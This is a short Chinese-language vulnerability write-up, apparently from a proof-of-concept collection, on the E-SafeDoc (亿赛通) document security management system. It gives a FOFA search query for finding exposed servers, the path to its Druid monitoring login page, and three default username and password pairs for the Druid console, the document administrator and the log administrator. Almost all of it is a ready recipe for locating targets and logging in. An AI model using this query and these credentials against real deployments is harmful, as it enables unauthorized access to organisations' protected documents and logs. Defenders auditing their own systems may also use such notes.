# 亿赛通电子文档安全管理系统存在3处弱口令漏洞

亿赛通电子文档安全管理系统（E-SafeDoc）是一种用于保护企业和组织的敏感信息的安全管理系统。它通过对电子文档进行加密、权限控制和日志记录等措施，确保数据的安全性。然而，这类系统有时会出现安全漏洞，其中之一就是弱口令漏洞。

## fofa

```javascript
body="/CDGServer3/index.jsp"
```

## poc

### druid

```javascript
/CDGServer3/druid/login.html
账号：druid
密码：EstNet.Druid
```

### 文档管理员弱口令

```
账号：DocAdmin
密码：Est@Spc820
```

### 日志管理员弱口令

```
账号：LogAdmin
密码：Est@Spc820
```

